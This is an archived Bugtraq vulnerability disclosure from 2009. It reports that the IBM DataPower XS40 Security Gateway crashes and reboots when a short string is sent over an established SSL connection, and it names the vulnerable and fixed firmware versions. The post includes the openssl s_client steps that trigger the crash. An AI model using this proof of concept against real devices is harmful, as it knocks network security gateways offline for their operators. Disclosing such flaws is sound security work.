[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[IBM Datapower XS40] Denial of Service
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: [IBM Datapower XS40] Denial of Service
- From: erik@xxxxxxxx
- Date: Thu, 8 Jan 2009 03:14:51 -0700
It appears it is possible to crash the IBM DataPower XS40 Security Gateway
device by sending a simple (random?) string to it, over an established
SSL-connection. The device reboots as a response to the input.
Tested vulnerable firmware is 3.6.1.5
Issue fixed as tested in 3.6.1.12
Tested as follows (entered attack-string is ´abc´ in this case):
openssl s_client -connect [IP]:[port]
Loading 'screen' into random state - done
CONNECTED(0000078C)
..
---
abc [enter][enter]
read:errno=0
After this, the device crashes and reboots